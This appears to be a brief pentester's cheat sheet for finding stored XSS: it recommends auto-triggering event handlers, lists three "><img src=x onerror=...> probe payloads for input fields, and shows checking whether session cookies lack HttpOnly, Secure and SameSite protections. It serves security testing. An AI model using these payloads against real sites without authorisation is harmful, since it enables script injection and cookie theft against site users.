it is best to use payloads with event handlers such as "onload", "onerror" which automatically executes and also prove the highest impact on stored XSS cases. if these two are blocked, then utilize the "onmouseover".
#perform basic test
root@oco:~$ BROWSER > {targetSite:port}
input field 1: "><img src=x onerror=prompt(document.domain)>
input field 2: "><img src=x onerror=confirm(1)>
input field 3: "><img src=x onerror=alert(1)>
* this will identify which field is vulnerable to XSS
* the document.domain is used to ensure that JavaScript is being executed on the
actual domain and not in a sandboxed environment.
- JavaScript being executed in a sandboxed environment prevents client-side
attacks, but there are sandbox escapes exists
* if no automatic triggers occur, utilize the site/page button to trigger them
#check if HTTPOnly is "off" using Web Developer Tools
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookies > {targetSite}
HttpOnly: False
Secure: False
SameSite: None